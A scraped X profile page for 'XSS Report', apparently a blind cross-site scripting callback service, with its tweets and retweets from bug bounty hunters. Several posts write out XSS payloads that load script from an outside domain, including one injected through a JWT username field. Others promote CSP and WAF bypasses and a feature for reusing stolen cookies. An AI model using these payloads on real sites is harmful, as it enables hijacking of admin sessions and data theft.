XssReport Profile Banner
XSS Report Profile
XSS Report

@XssReport

Followers
860
Following
184
Media
13
Statuses
64

The official X account for the https://t.co/aVdNMc0ZRW project. Please use the link on the website as a contact

Joined January 2023
Don't wanna be here? Send us removal request.
@zack0x01
zack0x01
2 months
Woke up on Blind xss notification ๐Ÿฅฑ One of ma blind xss payload fired on the admin panels ๐Ÿ‘€ #BugBounty #BugBountytips
7
2
137
@Mike07Masanga
Mike Masanga
2 months
@OreoB1scuit @Freyxfi @intigriti Th victim is the admin page which is vulnerable to xss if it is vulnerable to xss a notification comes (containing the cookie, Dom elememts,ip,the website and path) if you use an online platform like https://t.co/DxLJx8BOwp for the payloads this is blind xss by the way
Tweet card summary image
xss.report
Discover and address blind XSS vulnerabilities effectively using the automated services of xss.report.
2
2
4
@numanturle
numan turle
3 months
You can easily test your XSS payloads with this 3-character domain name. <script src='//ใ‰›.๏ฌ†'> <svg/onload=import('//ใ‰›.๏ฌ†')> #xss @xssreport
3
14
129
@XssReport
XSS Report
3 months
Users who have obtained VIP access for testing can now use a 4-character domain name, excluding the username. You will be able to access more with the additional features we will be introducing soon. We have special surprises coming soon that we will be announcing.
@XssReport
XSS Report
4 months
Our 5-character domain is now open to select users! Only 5 slots left. Donโ€™t miss, send us a DM! #xss #BugBounty
1
1
45
@XssReport
XSS Report
4 months
You know well where the payload is. it's just a click away and it's free. it's not a dream just a click away. https://t.co/BbA7gO0Av1
Tweet card summary image
xss.report
Discover and address blind XSS vulnerabilities effectively using the automated services of xss.report.
@intigriti
Intigriti
4 months
๐Ÿ” Blind XSS: The invisible injection point and delayed execution make them an easily overlooked vulnerability... ๐Ÿง Yet, they still have a severe impact on any organisation! ๐Ÿค  In our technical article, we documented our methodology for finding blind XSS vulnerabilities,
1
0
6
@XssReport
XSS Report
4 months
Our 5-character domain is now open to select users! Only 5 slots left. Donโ€™t miss, send us a DM! #xss #BugBounty
4
0
12
@XssReport
XSS Report
4 months
After sending requests, the error logs started reflecting my payload. 1 hour laterโ€ฆ I heard the @xssreport Telegram notification sound. And yes, it triggered. XSS achieved. ๐ŸŽฏ #bugbounty #infosec #xss
0
0
1
@XssReport
XSS Report
4 months
At this point, I thought: What if these logs are being processed in a private panel? ๐Ÿค” So I crafted this JWT payload: { "username": "test3rbb'\"><script src= https://t.co/GGlzDEogxU></script>", "guid": "bd874709-aac7-485a-a46d-6e33964ea930", "iat": 1754042605 }
1
0
1
@XssReport
XSS Report
4 months
"First, I bypassed JWT authentication by brute force the secret key. Once inside, I noticed some requests returned error messages. Digging deeper, I realized the app was logging the username field from the JWT into error messages debug mode was on. (sadly, no bonus for that ๐Ÿ˜…)
1
0
1
@XssReport
XSS Report
4 months
๐Ÿšจ Sharing an unbelievable XSS scenario. Why? Because @XSSReport users know XSS is not just an alert(1), it's an art. One of our followers analyzed the architecture, studied the attack surface, and came up with this ๐Ÿ‘‡
1
0
2
@XssReport
XSS Report
4 months
๐Ÿ”ฅ XSS pros, whatโ€™s your secret to finding hidden endpoints? ๐Ÿ•ต๏ธโ€โ™‚๏ธ #xss #BugBounty #bugbountytips
1
0
1
@ryancbarnett
Ryan Barnett (B0N3)
6 months
Full list here:
Tweet card summary image
github.com
CSPBypass.com, a tool designed to help ethical hackers bypass restrictive Content Security Policies (CSP) and exploit XSS (Cross-Site Scripting) vulnerabilities on sites where injections are blocke...
@intigriti
Intigriti
6 months
Is your XSS held back by script-src CSP policy? Try one of the following JSONP endpoints to bypass CSP! ๐Ÿ‘‡
1
11
62
@XssReport
XSS Report
6 months
๐Ÿงช Unsure where your XSS payload is firing? Itโ€™s not always obvious from the sourceโ€ฆ ๐ŸŽฏ Use the Custom Parameter feature to isolate and test input fields (like "name", "email", etc.) directly. Visualize it. Confirm it. Exploit it. ๐Ÿ‘‰ https://t.co/BbA7gO0Av1 #BugBounty #XSS
0
0
6
@scriptkiddie___
Milan Jain ๐Ÿ‡ฎ๐Ÿ‡ณ
7 months
๐Ÿšจ Jai Shri Ram ๐Ÿ™ Just secured a $100 bounty! Bug Types: 1.Blind xss in chat inbox payload used '%22%3E%3Cscript%20src= https://t.co/EyGg7tFECY #CyberSecurity #BugBounty #prerna #EthicalHacking #SecurityResearcher #Hacker #BugHunter #InfoSec #Reward #Exploit #ServerSecurity
4
5
71
@XssReport
XSS Report
7 months
Found an XSS vulnerability but received a $1,337 bounty? ๐Ÿ˜‚ Keep grinding, hunters! Big ๐Ÿ’ธ awaits! Share your funniest bounty tale in reply! ๐Ÿค“ https://t.co/BbA7gO0Av1 #BugBounty #XSS I was previously awarded $300 for an XSS I found in WordPress Core. Hahaha yes, admin finds #XSS
0
2
36
@XssReport
XSS Report
7 months
๐Ÿšจ PRO TIPS for XSS Hunters Stop pasting the same alert(1) everywhere! ๐Ÿ™…โ€โ™‚๏ธ๐Ÿ’ป โœ… First, ask: Where does your input land? ๐Ÿ“ In a <textarea>? ๐Ÿ”’ Inside an attribute? ๐Ÿ“„ Between tags? ๐ŸŽฏ Tailor your payload to the context. Itโ€™s not about luck โ€” itโ€™s about logic ๐Ÿง  </textarea><script
0
8
51
@XssReport
XSS Report
7 months
When your XSS report gets โ€œnot applicableโ€ but the siteโ€™s still vulnโ€ฆ ๐Ÿ˜… Prove โ€˜em wrong with our tools: https://t.co/BbA7gO0Av1 Keep hunting, champs! ๐Ÿ† #BugBounty #XSS
0
1
21
@XssReport
XSS Report
7 months
๐ŸŒ™ Night-owl XSS hunters! ๐Ÿ•ต๏ธโ€โ™‚๏ธ Whatโ€™s your go-to WAF bypass trick? Drop it below & test our AI XSS Analyzer: https://t.co/BbA7gO0Av1 ๐Ÿ˜Ž Best tip gets RTโ€™d! #BugBounty #XSS
Tweet card summary image
xss.report
Discover and address blind XSS vulnerabilities effectively using the automated services of xss.report.
0
0
9
@XssReport
XSS Report
8 months
๐Ÿš€ New Feature Alert on https://t.co/uVCBeEwMLN ๐Ÿ”ฅ We're leveling up your XSS game with AI-Powered XSS Analysis! ๐Ÿง ๐Ÿ’ก No more guessing โ€” instantly see where your payload executes in the DOM! ๐Ÿ’ป DOM tracing made simple ๐ŸŽฏ Precision payload debugging โฑ๏ธ Save hours on manual testing
2
3
53
@XssReport
XSS Report
8 months
๐Ÿš€ New feature alert!๐Ÿš€ Introducing Storage Data JavaScript This powerful JS code auto-sets stolen cookies, Session Storage, and Local Storage values exploited via ๐Ÿ”ฅXSS๐Ÿ”ฅvulnerabilities. Enhance your security testing now! ๐Ÿ”ฅ #XSS ๐Ÿ”ฅ #Cybersecurity ๐Ÿ”ฅ
0
2
56